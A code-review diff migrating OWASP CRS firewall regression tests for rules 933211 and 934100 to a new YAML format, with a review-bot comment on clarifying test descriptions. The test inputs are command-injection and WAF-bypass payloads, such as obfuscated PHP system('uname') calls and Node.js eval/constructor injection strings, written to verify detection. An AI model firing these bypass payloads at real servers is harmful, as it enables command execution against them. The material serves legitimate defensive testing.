"(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-7 + - input: + dest_addr: 127.0.0.1 
+ headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 
'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id 
"933211" - - test_title: 933211-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + 
output: + log_contains: id "933211" + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: 
"x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 19 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 20 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=(sy.(st).em)(%40id)" - version: "HTTP/1.1" - output: - log_contains: id "933211" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=(sy.(st).em)(%40id)" + version: "HTTP/1.1" + output: + log_contains: id "933211" 
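Review bot: The `desc` fields are now the only human-readable distinction between cases once `test_title: 933211-N` is collapsed to `test_id: N`, and two of them in this hunk are weak: tests 17 and 18 carry the identical `desc: Check FP if Cookie contains '/' (slash)` although they exercise different payloads (`x=(foo)/(bar)` vs `x=(/foo)/(/bar)`), and test 21 is the only case whose `uri` sends the parentheses raw (`/get?code=(sy.(st).em)(%40id)`) rather than as `%28`/`%29` like every other test, which the `desc` does not mention. Since a WAF regression test on raw vs percent-encoded input is testing a different transformation path, that distinction should be stated so a future edit does not "normalize" it away. I would change them to `desc: Check FP if Cookie contains '/' (slash) between parenthesized values`, `desc: Check FP if Cookie contains '/' (slash) inside and between parenthesized values`, and `desc: Block function call bypass '(sy.(st).em)(@id)' sent with raw (unencoded) parentheses and without trailing semi-colon`. The rest of the hunk is a mechanical format migration and looks consistent with the sibling files.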
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml index a38f9a38b..691f428d0 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934100.yaml 
@@ -1,419 +1,392 @@ --- meta: author: "lifeforms, airween, Max Leske, azurit" - enabled: true - name: "934100.yaml" description: "Tests for rule 934100" +rule_id: 934100 tests: - - test_title: 934100-1 + - test_id: 1 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=_%24%24ND_FUNC%24%24_" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=_%24%24ND_FUNC%24%24_" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 2 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=__js_function" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=__js_function" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 3 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: 
"/get?foo=eval%28String.fromCharCode" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=eval%28String.fromCharCode" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 4 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=function%28%29+%7B" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=function%28%29+%7B" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 5 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=new+Function+%28" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=new+Function+%28" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 6 desc: imported test stages: - - stage: - 
input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=this.constructor.constructor" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=this.constructor.constructor" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 7 desc: imported test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=module.exports%3D" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=module.exports%3D" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 8 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 9 desc: base64 encoded test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=XyQkTkRfRlVOQyQkXwo=" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 10 desc: process.env test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process.env" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=process.env" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 11 desc: console.info test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info(1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 12 desc: console.info test (JavaScript escape sequences) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=c%5Cu006fnsole.info(1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=c%5Cu006fnsole.info(1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 13 desc: process.env test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=process["env"]' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: 
'/get?foo=process["env"]' + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 14 desc: console.info test (square bracket property access) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?foo=console["info"](1)' - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?foo=console["info"](1)' + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 15 desc: console.info test (call method) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=console.info.call(this,1)" - version: HTTP/1.0 - output: - log_contains: id "934100" - - test_title: 934100-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=console.info.call(this,1)" + version: HTTP/1.0 + output: + log_contains: id "934100" + - test_id: 16 desc: '"process" false positive test' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=process." 
